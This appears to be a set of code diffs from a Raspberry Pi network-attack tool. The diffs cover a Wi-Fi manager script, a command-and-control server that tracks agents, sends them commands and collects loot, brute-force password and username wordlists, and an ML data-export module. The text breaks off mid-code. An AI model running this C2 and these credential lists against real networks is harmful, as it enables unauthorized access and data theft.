show_wifi_status
;;
3)
add_wifi_connection
;;
4)
delete_wifi_connection
;;
5)
clear_all_connections
;;
6)
manage_wifi_connections
;;
7)
force_refresh_wifi_connections
;;
8)
log "INFO" "Exiting Wifi Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-8."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts "hfclsadm" opt; do
case $opt in
h)
show_usage
;;
f)
force_refresh_wifi_connections
exit 0
;;
c)
clear_all_connections
exit 0
;;
l)
list_wifi_and_connect
exit 0
;;
s)
show_wifi_status
exit 0
;;
a)
add_wifi_connection
exit 0
;;
d)
delete_wifi_connection
exit 0
;;
m)
manage_wifi_connections
exit 0
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
# ============================================================
# Check Prerequisites Before Starting
# ============================================================
check_prerequisites
# ============================================================
# Handle preconfigured.nmconnection if Exists
# ============================================================
handle_preconfigured_connection
# ============================================================
# Start the Main Menu
# ============================================================
display_main_menu

@@ -612,6 +612,7 @@ class C2Manager:
        self._server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._server_socket.bind((self.bind_ip, self.bind_port))
        self._server_socket.listen(128)
+       self._server_socket.settimeout(1.0)
        # Start accept thread
        self._running = True
@@ -631,6 +632,12 @@ class C2Manager:
except Exception as e: except Exception as e:
self.logger.error(f"Failed to start C2 server: {e}") self.logger.error(f"Failed to start C2 server: {e}")
if self._server_socket:
try:
self._server_socket.close()
except Exception:
pass
self._server_socket = None
self._running = False self._running = False
return {"status": "error", "message": str(e)} return {"status": "error", "message": str(e)}
@@ -647,6 +654,12 @@ class C2Manager:
            self._server_socket.close()
            self._server_socket = None
+       if self._server_thread and self._server_thread.is_alive():
+           self._server_thread.join(timeout=3.0)
+           if self._server_thread.is_alive():
+               self.logger.warning("C2 accept thread did not exit cleanly")
+           self._server_thread = None
        # Disconnect all clients
        with self._lock:
            for client_id in list(self._clients.keys()):
@@ -774,7 +787,7 @@ class C2Manager:
        for row in rows:
            agent_id = row["id"]
-           # Conversion last_seen timestamp ms
+           # Conversion last_seen -> timestamp ms
            last_seen_raw = row.get("last_seen")
            last_seen_epoch = None
            if last_seen_raw:
@@ -803,7 +816,7 @@ class C2Manager:
"tags": [] "tags": []
} }
# --- 2) Écraser si agent en mémoire (connecté) --- # If connected in memory, prefer live telemetry values.
if agent_id in self._clients: if agent_id in self._clients:
info = self._clients[agent_id]["info"] info = self._clients[agent_id]["info"]
agent_info.update({ agent_info.update({
@@ -816,10 +829,10 @@ class C2Manager:
                    "disk": info.get("disk_percent", 0),
                    "ip": info.get("ip_address", agent_info["ip"]),
                    "uptime": info.get("uptime", 0),
-                   "last_seen": int(datetime.utcnow().timestamp() * 1000),  # en ms
+                   "last_seen": int(datetime.utcnow().timestamp() * 1000),
                })
-           # --- 3) Vérifier si trop vieux → offline ---
+           # Mark stale clients as offline.
            if agent_info["last_seen"]:
                delta = (now.timestamp() * 1000) - agent_info["last_seen"]
                if delta > OFFLINE_THRESHOLD * 1000:
@@ -827,33 +840,30 @@ class C2Manager:
            agents.append(agent_info)
-       # Déduplication par hostname (ou id fallback) : on garde le plus récent et on
-       # privilégie un statut online par rapport à offline.
+       # Deduplicate by hostname (or id fallback), preferring healthier/recent entries.
        dedup = {}
        for a in agents:
-           key = (a.get('hostname') or a['id']).strip().lower()
+           key = (a.get("hostname") or a["id"]).strip().lower()
            prev = dedup.get(key)
            if not prev:
                dedup[key] = a
                continue
-           def rank(status):  # online < idle < offline
-               return {'online': 0, 'idle': 1, 'offline': 2}.get(status, 3)
+           def rank(status):
+               return {"online": 0, "idle": 1, "offline": 2}.get(status, 3)
            better = False
-           if rank(a['status']) < rank(prev['status']):
+           if rank(a["status"]) < rank(prev["status"]):
                better = True
            else:
-               la = a.get('last_seen') or 0
-               lp = prev.get('last_seen') or 0
+               la = a.get("last_seen") or 0
+               lp = prev.get("last_seen") or 0
                if la > lp:
                    better = True
            if better:
                dedup[key] = a
        return list(dedup.values())
-       return agents
    def send_command(self, targets: List[str], command: str) -> dict:
        """Send command to specific agents"""
@@ -1060,6 +1070,8 @@ class C2Manager:
                    args=(sock, addr),
                    daemon=True
                ).start()
+           except socket.timeout:
+               continue
            except OSError:
                break  # Server socket closed
            except Exception as e:
@@ -1159,10 +1171,19 @@ class C2Manager:
    def _receive_from_client(self, sock: socket.socket, cipher: Fernet) -> Optional[dict]:
        try:
+           # OPTIMIZATION: Set timeout to prevent threads hanging forever
+           sock.settimeout(15.0)
            header = sock.recv(4)
            if not header or len(header) != 4:
                return None
            length = struct.unpack(">I", header)[0]
+           # Memory protection: prevent massive data payloads
+           if length > 10 * 1024 * 1024:
+               self.logger.warning(f"Rejecting oversized message: {length} bytes")
+               return None
            data = b""
            while len(data) < length:
                chunk = sock.recv(min(4096, length - len(data)))
@@ -1172,13 +1193,11 @@ class C2Manager:
            decrypted = cipher.decrypt(data)
            return json.loads(decrypted.decode())
        except (OSError, ConnectionResetError, BrokenPipeError):
-           # socket fermé/abandonné → None = déconnexion propre
            return None
        except Exception as e:
            self.logger.error(f"Receive error: {e}")
            return None

    def _send_to_client(self, client_id: str, command: str):
        with self._lock:
            client = self._clients.get(client_id)
@@ -1191,8 +1210,6 @@ class C2Manager:
            header = struct.pack(">I", len(encrypted))
            sock.sendall(header + encrypted)

    def _process_client_message(self, client_id: str, data: dict):
        with self._lock:
            if client_id not in self._clients:
@@ -1212,16 +1229,17 @@ class C2Manager:
        elif 'telemetry' in data:
            telemetry = data['telemetry']
            with self._lock:
-               client_info.update({
-                   'hostname': telemetry.get('hostname'),
-                   'platform': telemetry.get('platform'),
-                   'os': telemetry.get('os'),
-                   'os_version': telemetry.get('os_version'),
-                   'architecture': telemetry.get('architecture'),
-                   'cpu_percent': telemetry.get('cpu_percent', 0),
-                   'mem_percent': telemetry.get('mem_percent', 0),
-                   'disk_percent': telemetry.get('disk_percent', 0),
-                   'uptime': telemetry.get('uptime', 0)
-               })
+               # OPTIMIZATION: Prune telemetry fields kept in-memory
+               client_info.update({
+                   'hostname': str(telemetry.get('hostname', ''))[:64],
+                   'platform': str(telemetry.get('platform', ''))[:32],
+                   'os': str(telemetry.get('os', ''))[:32],
+                   'os_version': str(telemetry.get('os_version', ''))[:64],
+                   'architecture': str(telemetry.get('architecture', ''))[:16],
+                   'cpu_percent': float(telemetry.get('cpu_percent', 0)),
+                   'mem_percent': float(telemetry.get('mem_percent', 0)),
+                   'disk_percent': float(telemetry.get('disk_percent', 0)),
+                   'uptime': float(telemetry.get('uptime', 0))
+               })
            self.db.save_telemetry(client_id, telemetry)
            self.bus.emit({"type": "telemetry", "id": client_id, **telemetry})
@@ -1230,7 +1248,6 @@ class C2Manager:
            self._handle_loot(client_id, data['download'])
        elif 'result' in data:
            result = data['result']
            # >>> ici on enregistre avec la vraie commande
            self.db.save_command(client_id, last_cmd or '<unknown>', result, True)
            self.bus.emit({"type": "console", "target": client_id, "text": str(result), "kind": "RX"})
@@ -1329,3 +1346,6 @@ class C2Manager:
# ========== Global Instance ==========
c2_manager = C2Manager()
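The `_receive_from_client` changes above add a read timeout and a hard cap on the 4-byte length prefix. The wire format is length-prefixed: a big-endian `>I` header followed by the encrypted JSON payload. Below is a minimal, self-contained sketch of that framing; the Fernet cipher is replaced by an identity placeholder so it runs standalone, and `pack_frame`/`read_frame` are illustrative names, not functions from the codebase:

```python
import io
import json
import struct

def pack_frame(payload: dict, encrypt=lambda b: b) -> bytes:
    """Serialize a dict to JSON, 'encrypt' it, prepend a 4-byte big-endian length."""
    body = encrypt(json.dumps(payload).encode())
    return struct.pack(">I", len(body)) + body

def read_frame(stream, decrypt=lambda b: b, max_len=10 * 1024 * 1024):
    """Read one frame; reject oversized payloads like _receive_from_client does."""
    header = stream.read(4)
    if len(header) != 4:
        return None
    length = struct.unpack(">I", header)[0]
    if length > max_len:
        return None  # memory protection: drop the oversized message
    data = b""
    while len(data) < length:
        chunk = stream.read(min(4096, length - len(data)))
        if not chunk:
            return None  # peer closed mid-frame
        data += chunk
    return json.loads(decrypt(data).decode())

stream = io.BytesIO(pack_frame({"telemetry": {"cpu_percent": 12.5}}))
print(read_frame(stream))  # {'telemetry': {'cpu_percent': 12.5}}
```

In the real class the same loop runs over `sock.recv`, and `encrypt`/`decrypt` are `cipher.encrypt`/`cipher.decrypt` from a shared Fernet key.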

@@ -280,19 +280,23 @@ class CommentAI:
        if not rows:
            return None
-       # Weighted selection pool
-       pool: List[str] = []
-       for row in rows:
-           try:
-               w = int(_row_get(row, "weight", 1)) or 1
-           except Exception:
-               w = 1
-           w = max(1, w)
-           text = _row_get(row, "text", "")
-           if text:
-               pool.extend([text] * w)
-       chosen = random.choice(pool) if pool else _row_get(rows[0], "text", None)
+       # Weighted selection using random.choices (no temporary list expansion)
+       texts: List[str] = []
+       weights: List[int] = []
+       for row in rows:
+           text = _row_get(row, "text", "")
+           if text:
+               try:
+                   w = int(_row_get(row, "weight", 1)) or 1
+               except Exception:
+                   w = 1
+               texts.append(text)
+               weights.append(max(1, w))
+       if texts:
+           chosen = random.choices(texts, weights=weights, k=1)[0]
+       else:
+           chosen = _row_get(rows[0], "text", None)
        # Templates {var}
        if chosen and params:
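The change above replaces pool expansion (`[text] * weight`) with `random.choices` over parallel `texts`/`weights` lists, so memory stays O(rows) instead of O(sum of weights). A small standalone comparison of the two approaches (the sample rows are invented for illustration):

```python
import random
from collections import Counter

rows = [{"text": "rare", "weight": 1}, {"text": "common", "weight": 9}]

# Old approach: materialize the weighted pool (O(sum of weights) memory).
pool = []
for row in rows:
    pool.extend([row["text"]] * max(1, int(row["weight"])))

# New approach: random.choices draws from parallel lists (O(rows) memory).
texts = [r["text"] for r in rows]
weights = [max(1, int(r["weight"])) for r in rows]

random.seed(42)  # deterministic for the demo
draws = Counter(random.choices(texts, weights=weights, k=1000))
print(draws["common"] > draws["rare"])  # True: weights are respected
```

Both produce the same distribution; only the intermediate memory differs, which matters on a Pi Zero when weights are large.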

@@ -1,7 +1,16 @@
-root
-admin
-bjorn
+MqUG09FmPb
+OD1THT4mKMnlt2M$
+letmein
+QZKOJDBEJf
+ZrXqzIlZk3
+9XP5jT3gwJjmvULK
 password
-toor
-1234
-123456
+9Pbc8RjB5s
+fcQRQUxnZl
+Jzp0G7kolyloIk7g
+DyMuqqfGYj
+G8tCoDFNIM
+8gv1j!vubL20xCH$
+i5z1nlF3Uf
+zkg3ojoCoKAHaPo%
+oWcK1Zmkve

@@ -1,3 +1,8 @@
+manager
 root
 admin
-bjorn
+db_audit
+dev
+user
+boss
+deploy

data_consolidator.py (new file, 829 lines)

@@ -0,0 +1,829 @@
"""
data_consolidator.py - Data Consolidation Engine for Deep Learning
═══════════════════════════════════════════════════════════════════════════
Purpose:
Consolidate logged features into training-ready datasets.
Prepare data exports for deep learning on external PC.
Features:
- Aggregate features across time windows
- Compute statistical features
- Create feature vectors for neural networks
- Export in formats ready for TensorFlow/PyTorch
- Incremental consolidation (low memory footprint)
Author: Bjorn Team
Version: 2.0.0
"""
import json
import csv
import time
import gzip
import heapq
from datetime import datetime, timedelta
from typing import Dict, List, Any, Optional, Tuple
from pathlib import Path
from logger import Logger
logger = Logger(name="data_consolidator.py", level=20)
try:
import requests
except ImportError:
requests = None
class DataConsolidator:
"""
Consolidates raw feature logs into training datasets.
Optimized for Raspberry Pi Zero - processes in batches.
"""
def __init__(self, shared_data, export_dir: str = None):
"""
Initialize data consolidator
Args:
shared_data: SharedData instance
export_dir: Directory for export files
"""
self.shared_data = shared_data
self.db = shared_data.db
if export_dir is None:
# Default to shared_data path (cross-platform)
self.export_dir = Path(getattr(shared_data, 'ml_exports_dir', Path(shared_data.data_dir) / "ml_exports"))
else:
self.export_dir = Path(export_dir)
self.export_dir.mkdir(parents=True, exist_ok=True)
# Server health state consumed by orchestrator fallback logic.
self.last_server_attempted = False
self.last_server_contact_ok = None
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
logger.info(f"DataConsolidator initialized, exports: {self.export_dir}")
def _set_server_contact_state(self, attempted: bool, ok: Optional[bool]) -> None:
self.last_server_attempted = bool(attempted)
self.last_server_contact_ok = ok if attempted else None
def _apply_upload_backoff(self, base_backoff_s: int, max_backoff_s: int = 3600) -> int:
"""
Exponential upload retry backoff:
base -> base*2 -> base*4 ... capped at max_backoff_s.
Returns the delay (seconds) applied for the next retry window.
"""
base = max(10, int(base_backoff_s))
cap = max(base, int(max_backoff_s))
prev = float(getattr(self, "_upload_backoff_current_s", 0.0) or 0.0)
if prev <= 0:
delay = base
else:
delay = min(cap, max(base, int(prev * 2)))
self._upload_backoff_current_s = float(delay)
self._upload_backoff_until = time.monotonic() + delay
return int(delay)
# ═══════════════════════════════════════════════════════════════════════
# CONSOLIDATION ENGINE
# ═══════════════════════════════════════════════════════════════════════
def consolidate_features(
self,
batch_size: int = None,
max_batches: Optional[int] = None
) -> Dict[str, int]:
"""
Consolidate raw features into aggregated feature vectors.
Processes unconsolidated records in batches.
"""
if batch_size is None:
batch_size = int(getattr(self.shared_data, "ai_batch_size", 100))
batch_size = max(1, min(int(batch_size), 5000))
stats = {
'records_processed': 0,
'records_aggregated': 0,
'batches_completed': 0,
'errors': 0
}
try:
# Get unconsolidated records
unconsolidated = self.db.query("""
SELECT COUNT(*) as cnt
FROM ml_features
WHERE consolidated=0
""")[0]['cnt']
if unconsolidated == 0:
logger.info("No unconsolidated features to process")
return stats
logger.info(f"Consolidating {unconsolidated} feature records...")
batch_count = 0
while True:
if max_batches and batch_count >= max_batches:
break
# Fetch batch
batch = self.db.query(f"""
SELECT * FROM ml_features
WHERE consolidated=0
ORDER BY timestamp
LIMIT {batch_size}
""")
if not batch:
break
# Process batch
for record in batch:
try:
self._consolidate_single_record(record)
stats['records_processed'] += 1
except Exception as e:
logger.error(f"Error consolidating record {record['id']}: {e}")
stats['errors'] += 1
# Mark as consolidated
record_ids = [r['id'] for r in batch]
placeholders = ','.join('?' * len(record_ids))
self.db.execute(f"""
UPDATE ml_features
SET consolidated=1
WHERE id IN ({placeholders})
""", record_ids)
stats['batches_completed'] += 1
batch_count += 1
# Progress log
if batch_count % 10 == 0:
logger.info(
f"Consolidation progress: {stats['records_processed']} records, "
f"{stats['batches_completed']} batches"
)
logger.success(
f"Consolidation complete: {stats['records_processed']} records processed, "
f"{stats['errors']} errors"
)
except Exception as e:
logger.error(f"Consolidation failed: {e}")
stats['errors'] += 1
return stats
def _consolidate_single_record(self, record: Dict[str, Any]):
"""
Process a single feature record into aggregated form.
Computes statistical features and feature vectors.
"""
try:
# Parse JSON fields once — reused by _build_feature_vector to avoid double-parsing
host_features = json.loads(record.get('host_features', '{}'))
network_features = json.loads(record.get('network_features', '{}'))
temporal_features = json.loads(record.get('temporal_features', '{}'))
action_features = json.loads(record.get('action_features', '{}'))
# Combine all features
all_features = {
**host_features,
**network_features,
**temporal_features,
**action_features
}
# Build numerical feature vector — pass already-parsed dicts to avoid re-parsing
feature_vector = self._build_feature_vector(
host_features, network_features, temporal_features, action_features
)
# Determine time window
raw_ts = record['timestamp']
if isinstance(raw_ts, str):
try:
timestamp = datetime.fromisoformat(raw_ts)
except ValueError:
timestamp = datetime.now()
elif isinstance(raw_ts, datetime):
timestamp = raw_ts
else:
timestamp = datetime.now()
hourly_window = timestamp.replace(minute=0, second=0, microsecond=0).isoformat()
# Update or insert aggregated record
self._update_aggregated_features(
mac_address=record['mac_address'],
time_window='hourly',
timestamp=hourly_window,
action_name=record['action_name'],
success=record['success'],
duration=record['duration_seconds'],
reward=record['reward'],
feature_vector=feature_vector,
all_features=all_features
)
except Exception as e:
logger.error(f"Error consolidating single record: {e}")
raise
def _build_feature_vector(
self,
host_features: Dict[str, Any],
network_features: Dict[str, Any],
temporal_features: Dict[str, Any],
action_features: Dict[str, Any],
) -> Dict[str, float]:
"""
Build a named feature dictionary from already-parsed feature dicts.
Accepts pre-parsed dicts so JSON is never decoded twice per record.
Uses shared ai_utils for consistency.
"""
from ai_utils import extract_neural_features_dict
return extract_neural_features_dict(
host_features=host_features,
network_features=network_features,
temporal_features=temporal_features,
action_features=action_features,
)
def _update_aggregated_features(
self,
mac_address: str,
time_window: str,
timestamp: str,
action_name: str,
success: int,
duration: float,
reward: float,
feature_vector: Dict[str, float],
all_features: Dict[str, Any]
):
"""
Update or insert aggregated feature record.
Accumulates statistics over the time window.
"""
try:
# Check if record exists
existing = self.db.query("""
SELECT * FROM ml_features_aggregated
WHERE mac_address=? AND time_window=? AND computed_at=?
""", (mac_address, time_window, timestamp))
if existing:
# Update existing record
old = existing[0]
new_total = old['total_actions'] + 1
# ... typical stats update ...
# Merge feature vectors (average each named feature)
old_vector = json.loads(old['feature_vector']) # Now a Dict
if isinstance(old_vector, list): # Migration handle
old_vector = {}
merged_vector = {}
# Combine keys from both
all_keys = set(old_vector.keys()) | set(feature_vector.keys())
for k in all_keys:
v_old = old_vector.get(k, 0.0)
v_new = feature_vector.get(k, 0.0)
merged_vector[k] = (v_old * old['total_actions'] + v_new) / new_total
self.db.execute("""
UPDATE ml_features_aggregated
SET total_actions=total_actions+1,
success_rate=(success_rate*total_actions + ?)/(total_actions+1),
avg_duration=(avg_duration*total_actions + ?)/(total_actions+1),
total_reward=total_reward + ?,
feature_vector=?
WHERE mac_address=? AND time_window=? AND computed_at=?
""", (
success,
duration,
reward,
json.dumps(merged_vector),
mac_address,
time_window,
timestamp
))
else:
# Insert new record
self.db.execute("""
INSERT INTO ml_features_aggregated (
mac_address, time_window, computed_at,
total_actions, success_rate, avg_duration, total_reward,
feature_vector
) VALUES (?, ?, ?, 1, ?, ?, ?, ?)
""", (
mac_address,
time_window,
timestamp,
float(success),
duration,
reward,
json.dumps(feature_vector)
))
except Exception as e:
logger.error(f"Error updating aggregated features: {e}")
raise
# ═══════════════════════════════════════════════════════════════════════
# EXPORT FUNCTIONS
# ═══════════════════════════════════════════════════════════════════════
def export_for_training(
self,
format: str = 'csv',
compress: bool = True,
max_records: Optional[int] = None
) -> Tuple[str, int]:
"""
Export consolidated features for deep learning training.
Args:
format: 'csv', 'jsonl', or 'parquet'
compress: Whether to gzip the output
max_records: Maximum records to export (None = all)
Returns:
Tuple of (file_path, record_count)
"""
try:
if max_records is None:
max_records = int(getattr(self.shared_data, "ai_export_max_records", 1000))
max_records = max(100, min(int(max_records), 20000))
# Generate filename
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
base_filename = f"bjorn_training_{timestamp}.{format}"
if compress and format != 'parquet':
base_filename += '.gz'
filepath = self.export_dir / base_filename
# Fetch data
limit_clause = f"LIMIT {max_records}"
records = self.db.query(f"""
SELECT
mf.*,
mfa.feature_vector,
mfa.success_rate as aggregated_success_rate,
mfa.total_actions as aggregated_total_actions
FROM ml_features mf
LEFT JOIN ml_features_aggregated mfa
ON mf.mac_address = mfa.mac_address
WHERE mf.consolidated=1 AND mf.export_batch_id IS NULL
ORDER BY mf.timestamp DESC
{limit_clause}
""")
if not records:
logger.warning("No consolidated records to export")
return "", 0
# Extract IDs before export so we can free the records list early
record_ids = [r['id'] for r in records]
# Export based on format
if format == 'csv':
count = self._export_csv(records, filepath, compress)
elif format == 'jsonl':
count = self._export_jsonl(records, filepath, compress)
elif format == 'parquet':
count = self._export_parquet(records, filepath)
else:
raise ValueError(f"Unsupported format: {format}")
# Free the large records list immediately after export — record_ids is all we still need
del records
# Create export batch record
batch_id = self._create_export_batch(filepath, count)
# Update records with batch ID
placeholders = ','.join('?' * len(record_ids))
self.db.execute(f"""
UPDATE ml_features
SET export_batch_id=?
WHERE id IN ({placeholders})
""", [batch_id] + record_ids)
del record_ids
logger.success(
f"Exported {count} records to {filepath} "
f"(batch_id={batch_id})"
)
return str(filepath), count
except Exception as e:
logger.error(f"Export failed: {e}")
raise
def _export_csv(
self,
records: List[Dict],
filepath: Path,
compress: bool
) -> int:
"""Export records as CSV"""
open_func = gzip.open if compress else open
mode = 'wt' if compress else 'w'
# 1. Flatten all records first to collect all possible fieldnames
flattened = []
all_fieldnames = set()
for r in records:
flat = {
'timestamp': r['timestamp'],
'mac_address': r['mac_address'],
'ip_address': r['ip_address'],
'action_name': r['action_name'],
'success': r['success'],
'duration_seconds': r['duration_seconds'],
'reward': r['reward']
}
# Parse and flatten features
for field in ['host_features', 'network_features', 'temporal_features', 'action_features']:
try:
features = json.loads(r.get(field, '{}'))
for k, v in features.items():
if isinstance(v, (int, float, bool, str)):
flat_key = f"{field}_{k}"
flat[flat_key] = v
except Exception as e:
logger.debug(f"Skip bad JSON in {field}: {e}")
# Add named feature vector
if r.get('feature_vector'):
try:
vector = json.loads(r['feature_vector'])
if isinstance(vector, dict):
for k, v in vector.items():
flat[f'feat_{k}'] = v
elif isinstance(vector, list):
for i, v in enumerate(vector):
flat[f'feature_{i}'] = v
except Exception as e:
logger.debug(f"Skip bad feature vector: {e}")
flattened.append(flat)
all_fieldnames.update(flat.keys())
# 2. Sort fieldnames for consistency
sorted_fieldnames = sorted(list(all_fieldnames))
all_fieldnames = None # Free the set
# 3. Write CSV
with open_func(filepath, mode, newline='', encoding='utf-8') as f:
if flattened:
writer = csv.DictWriter(f, fieldnames=sorted_fieldnames)
writer.writeheader()
writer.writerows(flattened)
count = len(flattened)
flattened = None # Free the expanded list
return count
def _export_jsonl(
self,
records: List[Dict],
filepath: Path,
compress: bool
) -> int:
"""Export records as JSON Lines"""
open_func = gzip.open if compress else open
mode = 'wt' if compress else 'w'
with open_func(filepath, mode, encoding='utf-8') as f:
for r in records:
# Avoid mutating `records` in place to keep memory growth predictable.
row = dict(r)
for field in ['host_features', 'network_features', 'temporal_features', 'action_features', 'raw_event']:
try:
row[field] = json.loads(row.get(field, '{}'))
except Exception:
row[field] = {}
if row.get('feature_vector'):
try:
row['feature_vector'] = json.loads(row['feature_vector'])
except Exception:
row['feature_vector'] = {}
f.write(json.dumps(row) + '\n')
return len(records)
def _export_parquet(self, records: List[Dict], filepath: Path) -> int:
"""Export records as Parquet (requires pyarrow)"""
try:
import pyarrow as pa
import pyarrow.parquet as pq
# Flatten records
flattened = []
for r in records:
flat = dict(r)
# Parse JSON fields
for field in ['host_features', 'network_features', 'temporal_features', 'action_features', 'raw_event']:
flat[field] = json.loads(r.get(field, '{}'))
if r.get('feature_vector'):
flat['feature_vector'] = json.loads(r['feature_vector'])
flattened.append(flat)
# Convert to Arrow table
table = pa.Table.from_pylist(flattened)
# Write parquet
pq.write_table(table, filepath, compression='snappy')
return len(records)
except ImportError:
logger.error("Parquet export requires pyarrow. Falling back to CSV.")
return self._export_csv(records, filepath.with_suffix('.csv'), compress=True)
def _create_export_batch(self, filepath: Path, count: int) -> int:
"""Create export batch record and return batch ID"""
result = self.db.execute("""
INSERT INTO ml_export_batches (file_path, record_count, status)
VALUES (?, ?, 'exported')
""", (str(filepath), count))
# Get the inserted ID
batch_id = self.db.query("SELECT last_insert_rowid() as id")[0]['id']
return batch_id
# ═══════════════════════════════════════════════════════════════════════
# UTILITY METHODS
# ═══════════════════════════════════════════════════════════════════════
def get_export_stats(self) -> Dict[str, Any]:
"""Get statistics about exports"""
try:
batches = self.db.query("""
SELECT COUNT(*) as total_batches,
SUM(record_count) as total_records,
MAX(created_at) as last_export
FROM ml_export_batches
WHERE status='exported'
""")[0]
pending = self.db.query("""
SELECT COUNT(*) as cnt
FROM ml_features
WHERE consolidated=1 AND export_batch_id IS NULL
""")[0]['cnt']
return {
'total_export_batches': batches.get('total_batches', 0),
'total_records_exported': batches.get('total_records', 0),
'last_export_time': batches.get('last_export'),
'pending_export_count': pending
}
except Exception as e:
logger.error(f"Error getting export stats: {e}")
return {}
def flush_pending_uploads(self, max_files: int = 3) -> int:
"""
Retry uploads for previously exported batches that were not transferred yet.
Returns the number of successfully transferred files.
"""
max_files = max(0, int(max_files))
if max_files <= 0:
return 0
# No heavy "reliquat" tracking needed: pending uploads = files present in export_dir.
files = self._list_pending_export_files(limit=max_files)
ok = 0
for fp in files:
if self.upload_to_server(fp):
ok += 1
else:
# Stop early when server is unreachable to avoid repeated noise.
if self.last_server_attempted and self.last_server_contact_ok is False:
break
return ok
def _list_pending_export_files(self, limit: int = 3) -> List[str]:
"""
Return oldest export files present in export_dir.
This makes the backlog naturally equal to the number of files on disk.
"""
limit = max(0, int(limit))
if limit <= 0:
return []
try:
d = Path(self.export_dir)
if not d.exists():
return []
def _safe_mtime(path: Path) -> float:
try:
return path.stat().st_mtime
except Exception:
return float("inf")
# Keep only the N oldest files in memory instead of sorting all candidates.
files_iter = (p for p in d.glob("bjorn_training_*") if p.is_file())
oldest = heapq.nsmallest(limit, files_iter, key=_safe_mtime)
return [str(p) for p in oldest]
except Exception:
return []
def _mark_batch_status(self, filepath: str, status: str, notes: str = "") -> None:
"""Update ml_export_batches status for a given file path (best-effort)."""
try:
self.db.execute(
"""
UPDATE ml_export_batches
SET status=?, notes=?
WHERE file_path=?
""",
(status, notes or "", str(filepath)),
)
except Exception:
pass
def _safe_delete_uploaded_export(self, filepath: Path) -> None:
"""Delete a successfully-uploaded export file if configured to do so."""
try:
if not bool(self.shared_data.config.get("ai_delete_export_after_upload", True)):
return
fp = filepath.resolve()
base = Path(self.export_dir).resolve()
# Safety: only delete files under export_dir.
if base not in fp.parents:
return
fp.unlink(missing_ok=True) # Python 3.8+ supports missing_ok
except TypeError:
# Python < 3.8 fallback (not expected here, but safe)
try:
if filepath.exists():
filepath.unlink()
except Exception:
pass
except Exception:
pass
def upload_to_server(self, filepath: str) -> bool:
"""
Upload export file to AI Validation Server.
Args:
filepath: Path to the file to upload
Returns:
True if upload successful
"""
self._set_server_contact_state(False, None)
try:
import requests
except ImportError:
requests = None
if requests is None:
logger.info_throttled(
"AI upload skipped: requests not installed",
key="ai_upload_no_requests",
interval_s=600.0,
)
return False
url = self.shared_data.config.get("ai_server_url")
if not url:
logger.info_throttled(
"AI upload skipped: ai_server_url not configured",
key="ai_upload_no_url",
interval_s=600.0,
)
return False
backoff_s = max(10, int(self.shared_data.config.get("ai_upload_retry_backoff_s", 120)))
max_backoff_s = 3600
now_mono = time.monotonic()
if now_mono < self._upload_backoff_until:
remaining = int(self._upload_backoff_until - now_mono)
logger.debug(f"AI upload backoff active ({remaining}s remaining)")
logger.info_throttled(
"AI upload deferred: backoff active",
key="ai_upload_backoff_active",
interval_s=180.0,
)
return False
try:
filepath = Path(filepath)
if not filepath.exists():
logger.warning(f"AI upload skipped: file not found: {filepath}")
self._mark_batch_status(str(filepath), "missing", "file not found")
return False
# Get MAC address for unique identification
try:
from ai_utils import get_system_mac
mac = get_system_mac()
except ImportError:
mac = "unknown"
logger.debug(f"Uploading {filepath.name} to AI Server ({url}) unique_id={mac}")
self._set_server_contact_state(True, None)
with open(filepath, 'rb') as f:
files = {'file': f}
# Send MAC as query param
# Server expects ?mac_addr=...
params = {'mac_addr': mac}
# Short timeout to avoid blocking
response = requests.post(f"{url}/upload", files=files, params=params, timeout=10)
if response.status_code == 200:
self._set_server_contact_state(True, True)
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
logger.success(f"Uploaded {filepath.name} successfully")
self._mark_batch_status(str(filepath), "transferred", "uploaded")
self._safe_delete_uploaded_export(filepath)
return True
else:
self._set_server_contact_state(True, False)
next_retry_s = self._apply_upload_backoff(backoff_s, max_backoff_s)
logger.debug(
f"AI upload HTTP failure for {filepath.name}: status={response.status_code}, "
f"next retry in {next_retry_s}s"
)
logger.info_throttled(
f"AI upload deferred (HTTP {response.status_code})",
key=f"ai_upload_http_{response.status_code}",
interval_s=300.0,
)
return False
except Exception as e:
self._set_server_contact_state(True, False)
next_retry_s = self._apply_upload_backoff(backoff_s, max_backoff_s)
logger.debug(f"AI upload exception for {filepath}: {e} (next retry in {next_retry_s}s)")
logger.info_throttled(
"AI upload deferred: server unreachable (retry later)",
key="ai_upload_exception",
interval_s=300.0,
)
return False
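The deferral paths above lean on `_apply_upload_backoff` to space out retries. A minimal sketch of the exponential-backoff-with-cap scheme this suggests — the `next_backoff` helper below is hypothetical, not the project's actual implementation, and the 30 s base / 900 s cap are assumed values:

```python
def next_backoff(current_s: float, base_s: float = 30.0, max_s: float = 900.0) -> float:
    """Double the current delay, starting from base_s, capped at max_s."""
    return min(max_s, base_s if current_s <= 0 else current_s * 2)

# Hypothetical state mirroring _upload_backoff_current_s / _upload_backoff_until
delay = 0.0
schedule = []
for _ in range(7):
    delay = next_backoff(delay)
    schedule.append(delay)
# The retry interval grows geometrically, then saturates at the cap.
```

Each failed upload would store `now_mono + delay` into `_upload_backoff_until`, which is exactly the guard checked at the top of the method.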
def cleanup_old_exports(self, days: int = 30):
"""Delete export files older than N days"""
try:
cutoff = datetime.now() - timedelta(days=days)
old_batches = self.db.query("""
SELECT file_path FROM ml_export_batches
WHERE created_at < ?
""", (cutoff.isoformat(),))
deleted = 0
for batch in old_batches:
filepath = Path(batch['file_path'])
if filepath.exists():
filepath.unlink()
deleted += 1
# Clean up database records
self.db.execute("""
DELETE FROM ml_export_batches
WHERE created_at < ?
""", (cutoff.isoformat(),))
logger.info(f"Cleaned up {deleted} old export files")
except Exception as e:
logger.error(f"Cleanup failed: {e}")
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════
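A note on `cleanup_old_exports` above: comparing `created_at < ?` against `cutoff.isoformat()` relies on SQLite's lexicographic TEXT comparison, which matches chronological order only while every stored timestamp uses the same ISO-8601 format. A small demonstration of that assumption:

```python
import sqlite3
from datetime import datetime, timedelta

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE ml_export_batches (file_path TEXT, created_at TEXT)")
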